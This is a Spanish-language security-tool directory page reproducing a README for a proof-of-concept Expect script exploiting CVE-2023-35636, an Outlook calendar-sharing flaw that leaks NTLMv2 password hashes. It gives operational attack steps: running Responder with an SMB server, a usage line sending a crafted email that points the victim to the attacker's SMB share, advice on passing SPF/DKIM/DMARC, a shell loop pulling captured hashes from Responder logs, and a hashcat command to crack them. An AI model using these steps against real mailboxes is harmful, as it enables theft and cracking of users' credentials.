Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-35636 — Vulnerabilidad de divulgación de información de Microsoft Outlook (filtración de hash de contraseña) - Expect Script POC | Kitploit
Herramientas/GitHubGitHub/duy-31/cve-2023-35636
Ataques de ContraseñasAnálisis de VulnerabilidadesExplotaciónExfiltración de DatosAprendizaje y EducaciónSeguridad de Correo Electrónico
GitHubduy-31/cve-2023-35636

CVE-2023-35636

Vulnerabilidad de divulgación de información de Microsoft Outlook (filtración de hash de contraseña) - Expect Script POC

Ver Repositorio
4364hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-35636

Vulnerabilidad de divulgación de información de Microsoft Outlook (filtración de hash de contraseña) - Script POC en Expect

CVE-2023-35636 es un exploit de la función de compartir calendario en Microsoft Outlook, mediante el cual agregar dos encabezados a un correo electrónico dirige a Outlook a compartir contenido y contactar a una máquina designada, creando una oportunidad para interceptar un hash NTLM v2.

  • Ejecutar un responder con servidor SMB activado

imagen

  • Enviar un correo electrónico y esperar (el cortafuegos del destinatario debe permitir el tráfico SMB (445))

usage: ./cve-2023-35636.sh mx.fqdn port email_sender email_recipient smb_share

./cve-2023-35636.sh mail.mydomain.com 25 [email protected] [email protected] \\\\x.x.x.x\\mycalendar.ics (no olvides todas las \)

imagen

notas: chmod +x cve-2023-35636.sh requiere la aplicación expect requiere un remitente IP legítimo y un remitente de correo electrónico (para pasar SPF, DKIM, DMARC)

  • Si el usuario destinatario hace clic en el pequeño icono del calendario .. BOOM la IP/usuario (texto plano) y el hash de la contraseña (NTLM-v2-SSP) se envían a la IP de tu responder

imagen

imagen

  • Luego puedes intentar descifrar la contraseña con hashcat/john the ripper

for user in strings Responder-Session.log | grep "NTLMv2-SSP Hash" | cut -d ":" -f 4-6 | sort -u -f | awk '{$1=$1};1'

do

echo "[*] search for: $user";

strings Responder-Session.log | grep "NTLMv2-SSP Hash" | grep -i $user | cut -d ":" -f 4-10 | head -n 1 | awk '{$1=$1};1' >> ntlm-hashes.txt

done

hashcat -a 0 -m 5600 ntlm-hashes.txt rockyou.txt -o cracked.txt -O


Créditos: https://www.varonis.com/blog/outlook-vulnerability-new-ways-to-leak-ntlm-hashes

Solución alternativa/Corrección: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35636


más sobre mí ;) https://www.linkedin.com/in/duy-huan-bui/

⚠️ Aviso legal: IMPORTANTE: Este script se proporciona SOLO para fines educativos, pruebas éticas y uso legal. No lo use en ningún sistema o red sin permiso explícito. El acceso no autorizado a sistemas informáticos y redes es ilegal, y los usuarios que realicen actividades no autorizadas están sujetos a acciones legales. El autor NO es responsable de ningún daño causado por el mal uso de este script.

Descargar herramienta